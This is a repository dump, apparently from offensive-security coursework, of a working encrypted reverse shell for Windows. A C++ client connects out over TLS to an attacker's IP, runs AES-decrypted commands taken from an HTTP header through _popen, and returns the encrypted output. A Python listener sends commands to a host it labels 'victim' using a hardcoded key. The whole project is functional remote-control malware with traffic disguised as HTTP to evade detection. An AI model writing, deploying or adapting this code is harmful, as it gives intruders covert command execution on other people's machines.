11 | class AES_CBC {
12 | public:
13 |     // Constructor to initialize the AES_CBC object with the encryption key and fixed IV
14 |     AES_CBC(const unsigned char* key, const unsigned char* fixed_iv);
15 | 
16 |     // Encrypt data using AES-CBC
17 |     void encrypt(unsigned char* input, unsigned char* output, int length);
18 | 
19 |     // Decrypt data using AES-CBC
20 |     void decrypt(unsigned char* input, unsigned char* output, int length);
21 | 
22 |     // Print data in hex format for debugging
23 |     void printHex(unsigned char* data, int length);
24 | 
25 | private:
26 |     AES_KEY encryptKey;    // AES encryption key
27 |     AES_KEY decryptKey;    // AES decryption key
28 |     unsigned char iv[AES_BLOCK_SIZE];  // Initialization vector for AES-CBC
29 | };
30 | 
31 | // Function to convert binary data to a hex string
32 | std::string toHex(const unsigned char* data, size_t length);
33 | 
34 | // Function to convert a hex string to binary data
35 | std::vector<unsigned char> fromHex(const std::string& hex);
36 | 
37 | // Function to remove padding from decrypted data
38 | std::vector<unsigned char> removePadding(const std::vector<unsigned char>& data);
39 | 
40 | // Function to decrypt a command from hex format
41 | std::string decryptCommand(const std::string& encryptedHex, AES_CBC& aes);
42 | 
43 | // Function to encrypt a command into hex format
44 | std::string encryptCommand(const std::string& command, AES_CBC& aes);
45 | 
46 | #endif // AES_CBC_H


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/SSLReverseShell.cpp:
--------------------------------------------------------------------------------
  1 | #include <winsock2.h>
  2 | #include <windows.h>
  3 | #include <openssl/ssl.h>
  4 | #include <openssl/err.h>
  5 | #include <vector>
  6 | #include <stdexcept>
  7 | #include <stdio.h>
  8 | #include "AES_CBC.h"
  9 | #include <iostream>
 10 | #include <string>
 11 | #include <sstream>
 12 | #pragma comment(lib, "WS2_32")
 13 | #pragma comment(lib, "crypt32")
 14 | 
 15 | // Initialize OpenSSL by loading error strings and algorithms.
 16 | void InitializeSSL() {
 17 |     SSL_load_error_strings();
 18 |     OpenSSL_add_ssl_algorithms();
 19 | }
 20 | 
 21 | // Create an SSL context for TLS communication.
 22 | // Uses the TLS client method to configure the context.
 23 | SSL_CTX* CreateSSLContext() {
 24 |     const SSL_METHOD* method = TLS_client_method();
 25 |     SSL_CTX* ctx = SSL_CTX_new(method);
 26 | 
 27 |     if (!ctx) {
 28 |         perror("Unable to create SSL context");
 29 |         ERR_print_errors_fp(stderr);
 30 |         exit(EXIT_FAILURE);
 31 |     }
 32 | 
 33 |     return ctx;
 34 | }
 35 | 
 36 | // Clean up OpenSSL by freeing resources.
 37 | void CleanupSSL() {
 38 |     EVP_cleanup();
 39 | }
 40 | 
 41 | // Extract the "X-Command" header value from an HTTP request.
 42 | // Returns the value of the header or an empty string if not found.
 43 | std::string ExtractCommand(const std::string& request) {
 44 |     std::string header = "X-Command: ";
 45 |     size_t pos = request.find(header);
 46 |     if (pos != std::string::npos) {
 47 |         size_t end_pos = request.find("\r\n", pos);
 48 |         return request.substr(pos + header.length(), end_pos - pos - header.length());
 49 |     }
 50 |     return "";
 51 | }
 52 | 
 53 | int main(int argc, char* argv[]) {
 54 |     // Validate arguments for attacker IP and port.
 55 |     if (argc != 3) {
 56 |         std::cerr << "Usage: " << argv[0] << " <ATTACKER_IP> <ATTACKER_PORT>" << std::endl;
 57 |         return 1;
 58 |     }
 59 | 
 60 |     char* ATTACKER_IP = argv[1];
 61 |     short ATTACKER_PORT = static_cast<short>(std::atoi(argv[2]));
 62 | 
 63 |     if (ATTACKER_PORT <= 0 || ATTACKER_PORT > 65535) {
 64 |         std::cerr << "Error: Port must be between 1 and 65535." << std::endl;
 65 |         return 1;
 66 |     }
 67 | 
 68 |     // Initialize Winsock.
 69 |     WSADATA wsaData;
 70 |     WSAStartup(MAKEWORD(2, 2), &wsaData);
 71 | 
 72 |     // Create a TCP socket.
 73 |     SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
 74 |     if (sock == INVALID_SOCKET) {
 75 |         printf("Socket creation failed: %d\n", WSAGetLastError());
 76 |         return 1;
 77 |     }
 78 | 
 79 |     // Configure the server address and port.
 80 |     struct sockaddr_in server;
 81 |     server.sin_addr.s_addr = inet_addr(ATTACKER_IP);
 82 |     server.sin_family = AF_INET;
 83 |     server.sin_port = htons(ATTACKER_PORT);
 84 | 
 85 |     // Attempt to connect to the server.
 86 |     if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
 87 |         printf("Connection failed: %d\n", WSAGetLastError());
 88 |         return 1;
 89 |     }
 90 | 
 91 |     // Initialize SSL and create an SSL context.
 92 |     InitializeSSL();
 93 |     SSL_CTX* ctx = CreateSSLContext();
 94 | 
 95 |     // Create an SSL object and associate it with the socket.
 96 |     SSL* ssl = SSL_new(ctx);
 97 |     SSL_set_fd(ssl, sock);
 98 | 
 99 |     // Establish an SSL/TLS connection.
100 |     if (SSL_connect(ssl) <= 0) {
101 |         ERR_print_errors_fp(stderr);
102 |     }
103 |     else {
104 |         printf("Connected with %s encryption\n", SSL_get_cipher(ssl));
105 | 
106 |         char buffer[4096];
107 |         while (true) {
108 |             // Read data from the server.
109 |             int bytes = SSL_read(ssl, buffer, sizeof(buffer) - 1);
110 |             if (bytes > 0) {
111 |                 buffer[bytes] = '\0';
112 |                 printf("[+] Received request:\n%s\n", buffer);
113 | 
114 |                 std::string request(buffer);
115 |                 std::string command = ExtractCommand(request); // Extract the "X-Command" header.
116 | 
117 |                 // Encryption key and IV for AES-128.
118 |                 unsigned char key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0x6d, 0x29, 0x58, 0x41, 0x60, 0x74, 0x5c, 0x3e, 0x7b, 0x71, 0x3a };
119 |                 unsigned char iv[16] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f };
120 | 
121 |                 // Create an AES_CBC object for encryption and decryption.
122 |                 AES_CBC aes(key, iv);
123 | 
124 |                 // Decrypt the command from the HTTP header.
125 |                 std::string decryptedCommand = decryptCommand(command, aes);
126 | 
127 |                 if (!decryptedCommand.empty()) {
128 |                     printf("[+] Executing command: %s\n", decryptedCommand.c_str());
129 | 
130 |                     // Execute the decrypted command.
131 |                     FILE* fp = _popen(decryptedCommand.c_str(), "r");
132 |                     if (!fp) {
133 |                         printf("[-] Failed to execute command\n");
134 |                         break;
135 |                     }
136 | 
137 |                     std::ostringstream response;
138 |                     char result[1024];
139 |                     while (fgets(result, sizeof(result), fp) != NULL) {
140 |                         response << result;
141 |                     }
142 |                     _pclose(fp);
143 | 
144 |                     printf("[+] response: %s\n", result);
145 | 
146 |                     // Encrypt the response.
147 |                     std::string encryptedResponse = encryptCommand(response.str(), aes);
148 | 
149 |                     // Format the response as an HTTP response.
150 |                     std::ostringstream httpResponse;
151 |                     httpResponse << "HTTP/1.1 200 OK\r\n"
152 |                         << "Content-Type: text/plain\r\n"
153 |                         << "Content-Length: " << encryptedResponse.length() << "\r\n\r\n"
154 |                         << encryptedResponse;
155 | 
156 |                     // Log and send the response.
157 |                     std::cout << "Encrypted data: " << encryptedResponse << std::endl;
158 |                     SSL_write(ssl, httpResponse.str().c_str(), httpResponse.str().length());
159 | 
160 |                     // Output buffer for decryption => for debugging purposes
161 |                     std::string decryptedResponse = decryptCommand(encryptedResponse, aes);
162 |                     // Print the decrypted data
163 |                     std::cout << "Decrypted data: " << std::endl;
164 |                     std::cout << decryptedResponse << std::endl;
165 |                 }
166 |                 else {
167 |                     printf("[-] No valid command found in headers\n");
168 |                 }
169 |             }
170 |         }
171 |     }
172 | 
173 |     // Clean up resources.
174 |     SSL_free(ssl);
175 |     closesocket(sock);
176 |     SSL_CTX_free(ctx);
177 |     CleanupSSL();
178 |     WSACleanup();
179 | 
180 |     return 0;
181 | }


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/SSLReverseShell.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{cfbcccb3-f5d8-47e5-aa84-40ad41cb8408}</ProjectGuid>
 25 |     <RootNamespace>SSLReverseShell</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 89 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 97 |       <OptimizeReferences>true</OptimizeReferences>
 98 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |       <AdditionalIncludeDirectories>C:\Program Files\OpenSSL-Win64\include</AdditionalIncludeDirectories>
108 |     </ClCompile>
109 |     <Link>
110 |       <SubSystem>Console</SubSystem>
111 |       <GenerateDebugInformation>true</GenerateDebugInformation>
112 |       <AdditionalLibraryDirectories>C:\Program Files\OpenSSL-Win64\lib</AdditionalLibraryDirectories>
113 |       <AdditionalDependencies>C:\Program Files\OpenSSL-Win64\lib\VC\x64\MD\libssl.lib;C:\Program Files\OpenSSL-Win64\lib\VC\x64\MD\libcrypto.lib;%(AdditionalDependencies)</AdditionalDependencies>
114 |     </Link>
115 |   </ItemDefinitionGroup>
116 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
117 |     <ClCompile>
118 |       <WarningLevel>Level3</WarningLevel>
119 |       <FunctionLevelLinking>true</FunctionLevelLinking>
120 |       <IntrinsicFunctions>true</IntrinsicFunctions>
121 |       <SDLCheck>true</SDLCheck>
122 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
123 |       <ConformanceMode>true</ConformanceMode>
124 |       <AdditionalIncludeDirectories>C:\OpenSSLWin64\install\include</AdditionalIncludeDirectories>
125 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
126 |     </ClCompile>
127 |     <Link>
128 |       <SubSystem>Console</SubSystem>
129 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
130 |       <OptimizeReferences>true</OptimizeReferences>
131 |       <GenerateDebugInformation>true</GenerateDebugInformation>
132 |       <AdditionalLibraryDirectories>C:\OpenSSLWin64\install\lib</AdditionalLibraryDirectories>
133 |       <AdditionalDependencies>C:\OpenSSLWin64\install\lib\libssl.lib;C:\OpenSSLWin64\install\lib\libcrypto.lib;%(AdditionalDependencies)</AdditionalDependencies>
134 |     </Link>
135 |     <ProjectReference>
136 |       <LinkLibraryDependencies>true</LinkLibraryDependencies>
137 |       <UseLibraryDependencyInputs>false</UseLibraryDependencyInputs>
138 |     </ProjectReference>
139 |   </ItemDefinitionGroup>
140 |   <ItemGroup>
141 |     <ClCompile Include="AES_CBC.cpp" />
142 |     <ClCompile Include="SSLReverseShell.cpp" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClInclude Include="AES_CBC.h" />
146 |   </ItemGroup>
147 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
148 |   <ImportGroup Label="ExtensionTargets">
149 |   </ImportGroup>
150 | </Project>


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/SSLReverseShell.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="SSLReverseShell.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="AES_CBC.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="AES_CBC.h">
27 |       <Filter>Header Files</Filter>
28 |     </ClInclude>
29 |   </ItemGroup>
30 | </Project>


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/SSLReverseShell.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/x64/Release/SSLReverseShell.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\vc143.pdb
 2 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.obj
 3 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\aes_cbc.obj
 4 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\x64\release\sslreverseshell.exe
 5 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\x64\release\sslreverseshell.pdb
 6 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.ipdb
 7 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.iobj
 8 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\cl.command.1.tlog
 9 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\cl.items.tlog
10 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\cl.read.1.tlog
11 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\cl.write.1.tlog
12 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\link.command.1.tlog
13 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\link.read.1.tlog
14 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\link.secondary.1.tlog
15 | c:\users\vixx\desktop\tools\pen-300\csa containers\sslreverseshell\sslreverseshell\x64\release\sslreverseshell.tlog\link.write.1.tlog
16 | 


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/x64/Release/SSLReverseShell.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\Vixx\Desktop\Tools\PEN-300\CSA Containers\SSLReverseShell\x64\Release\SSLReverseShell.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/x64/Release/SSLReverseShell.log:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/x64/Release/SSLReverseShell.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/SSLReverseShell/x64/Release/SSLReverseShell.vcxproj.FileListAbsolute.txt


--------------------------------------------------------------------------------
/SSLReverseShell/x64/Release/SSLReverseShell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/x64/Release/SSLReverseShell.exe


--------------------------------------------------------------------------------
/SSLReverseShell/x64/Release/SSLReverseShell.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/x64/Release/SSLReverseShell.pdb


--------------------------------------------------------------------------------
/images/Include.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/images/Include.png


--------------------------------------------------------------------------------
/images/Linker1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/images/Linker1.png


--------------------------------------------------------------------------------
/images/Linker2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/images/Linker2.png


--------------------------------------------------------------------------------
/images/MT.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/images/MT.png


--------------------------------------------------------------------------------
/sslserver.py:
--------------------------------------------------------------------------------
  1 | import ssl
  2 | import socket
  3 | import binascii
  4 | from Crypto.Cipher import AES
  5 | 
  6 | # Configuration
  7 | host = '0.0.0.0'
  8 | port = 443
  9 | certfile = 'attacker.crt'
 10 | keyfile = 'attacker.key'
 11 | 
 12 | # AES configuration
 13 | aes_key = bytes([0x2b, 0x7e, 0x15, 0x16, 0x28, 0x6d, 0x29, 0x58, 0x41, 0x60, 0x74, 0x5c, 0x3e, 0x7b, 0x71, 0x3a])  # Key from C program
 14 | aes_iv = bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f])  # IV from C program
 15 | 
 16 | def decrypt_aes_cbc(encrypted_hex):
 17 |     """Decrypt AES-CBC encrypted hex data into plaintext."""
 18 |     try:
 19 |         encrypted_data = binascii.unhexlify(encrypted_hex)  # Convert hex to bytes
 20 |         cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)  # Create AES cipher
 21 |         decrypted_data = cipher.decrypt(encrypted_data)  # Decrypt
 22 |         #print(f"Decrypted data (hex): {binascii.hexlify(decrypted_data)}")  # Print raw decrypted data
 23 |         return decrypted_data.rstrip(b'\x00').decode('utf-8', errors='ignore')  # Remove padding and decode to string
 24 |     except Exception as e:
 25 |         return f"Decryption error: {e}"
 26 | 
 27 | 
 28 | def pad(data):
 29 |     """Add PKCS7 padding to data to align with AES block size."""
 30 |     padding_length = AES.block_size - len(data) % AES.block_size
 31 |     return data + bytes([padding_length] * padding_length)  # Add padding
 32 | 
 33 | def unpad(data):
 34 |     """Remove PKCS7 padding from data."""
 35 |     padding_length = data[-1]
 36 |     if padding_length < 1 or padding_length > AES.block_size:
 37 |         raise ValueError("Invalid padding length")
 38 |     
 39 |     # Ensure the padding length matches the number of padding bytes
 40 |     if data[-padding_length:] != bytes([padding_length] * padding_length):
 41 |         raise ValueError("Incorrect padding")
 42 |     
 43 |     return data[:-padding_length]  # Remove the padding
 44 | 
 45 | def encrypt_aes_cbc(plaintext):
 46 |     """Encrypt plaintext using AES-CBC mode."""
 47 |     try:
 48 |         cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)  # Create AES cipher
 49 |         padded_plaintext = pad(plaintext.encode())  # Add padding
 50 |         encrypted_data = cipher.encrypt(padded_plaintext)  # Encrypt
 51 |         return binascii.hexlify(encrypted_data).decode()  # Convert to hex string
 52 |     except Exception as e:
 53 |         return f"Encryption error: {e}"
 54 | 
 55 | def extract_body_from_response(response):
 56 |     """Extract the body content from an HTTP response."""
 57 |     body_start = response.find('\r\n\r\n')  # Locate the start of the body
 58 |     if body_start != -1:
 59 |         return response[body_start + 4:]  # Extract content after headers
 60 |     return None
 61 | 
 62 | def receive_full_response(conn):
 63 |     """Receive and reconstruct a full HTTP response based on Content-Length."""
 64 |     response_data = b""
 65 |     
 66 |     # Read the header to determine Content-Length
 67 |     while b"\r\n\r\n" not in response_data:  # Look for the end of headers
 68 |         chunk = conn.recv(4096)
 69 |         if not chunk:
 70 |             break
 71 |         response_data += chunk
 72 | 
 73 |     headers, body = response_data.split(b"\r\n\r\n", 1)  # Split headers and body
 74 |     headers_str = headers.decode('utf-8', errors='ignore')
 75 | 
 76 |     # Parse Content-Length
 77 |     content_length = 0
 78 |     for line in headers_str.split("\r\n"):
 79 |         if line.lower().startswith("content-length:"):
 80 |             content_length = int(line.split(":")[1].strip())
 81 |             break
 82 | 
 83 |     # Receive the body based on Content-Length
 84 |     while len(body) < content_length:
 85 |         chunk = conn.recv(4096)
 86 |         if not chunk:
 87 |             break
 88 |         body += chunk
 89 | 
 90 |     return headers.decode('utf-8', errors='ignore') + "\r\n\r\n" + body.decode('utf-8', errors='ignore')
 91 | 
 92 | def start_server():
 93 |     """Start an SSL/TLS server and handle client connections."""
 94 |     context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
 95 |     context.load_cert_chain(certfile=certfile, keyfile=keyfile)
 96 | 
 97 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
 98 |         sock.bind((host, port))  # Bind to the specified host and port
 99 |         sock.listen(5)  # Start listening for connections
100 | 
101 |         with context.wrap_socket(sock, server_side=True) as ssock:
102 |             print(f"[*] Listening on {host}:{port}")
103 | 
104 |             while True:
105 |                 conn, addr = ssock.accept()  # Accept a new connection
106 |                 print(f"[+] Connection from {addr}")
107 | 
108 |                 try:
109 |                     while True:
110 |                         command = input("Enter command to send (or 'exit' to close connection): ")
111 |                         if command.strip().lower() == "exit":
112 |                             print("[*] Closing connection...")
113 |                             conn.close()
114 |                             break
115 | 
116 |                         if not command.strip():
117 |                             print("[-] Empty command. Skipping...")
118 |                             continue
119 |                         
120 |                         # Encrypt the command
121 |                         encrypted_command = encrypt_aes_cbc(command)
122 |                         print(f"[+] Encrypted command: {encrypted_command}")
123 |                         
124 |                         http_request = (
125 |                             f"POST / HTTP/1.1\r\n"
126 |                             f"Host: victim\r\n"
127 |                             f"X-Command: {encrypted_command}\r\n"
128 |                             f"Content-Type: application/x-www-form-urlencoded\r\n"
129 |                             f"Content-Length: 0\r\n\r\n"
130 |                         )
131 |                         conn.sendall(http_request.encode())  # Send the HTTP request
132 | 
133 |                         response = receive_full_response(conn)  # Receive full response
134 |                         print(f"[+] Received response:\n{response}")
135 | 
136 |                         body = extract_body_from_response(response)  # Extract response body
137 |                         if body:
138 |                             decrypted_response = decrypt_aes_cbc(body)  # Decrypt the body
139 |                             print(f"[+] Decrypted response:\n{decrypted_response}")
140 |                         else:
141 |                             print("[-] No body found in response.")
142 |                 except Exception as e:
143 |                     print(f"[-] Error: {e}")
144 |                 finally:
145 |                     conn.close()  # Close the connection
146 | 
147 | if __name__ == "__main__":
148 |     start_server()
149 | 


--------------------------------------------------------------------------------